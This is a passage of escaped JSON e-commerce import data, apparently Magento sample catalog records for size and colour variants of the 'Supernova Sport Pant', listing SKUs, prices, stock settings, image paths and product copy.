Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"721\":{\"sku\":\"MP04-33-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-33-Gray\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-33-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp04-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp04-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Gray\"},\"722\":{\"sku\":\"MP04-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-33-Green\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"723\":{\"sku\":\"MP04-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-34-Black\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"724\":{\"sku\":\"MP04-34-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-34-Gray\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-34-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp04-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp04-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Gray\"},\"725\":{\"sku\":\"MP04-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-34-Green\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"726\":{\"sku\":\"MP04-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-36-Black\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"727\":{\"sku\":\"MP04-36-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-36-Gray\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-36-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp04-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp04-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Gray\"},\"728\":{\"sku\":\"MP04-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\",\"product_websites\":\"base\",\"name\":\"Supernova Sport Pant-36-Green\",\"description\":\"<p>Turn the corner and open it up -- your driveway is two blocks away. The Supernova Sport Pant gets you there with key features like moisture-wicking LumaTech&trade; fabric and mesh ventilation. Side seam pockets ensure total convenience during rest periods.<\\/p>\\n<p>&bull; Dark heather gray straight leg cotton pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Internal drawstring. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"supernova-sport-pant-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"729\":{\"sku\":\"MP04\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default 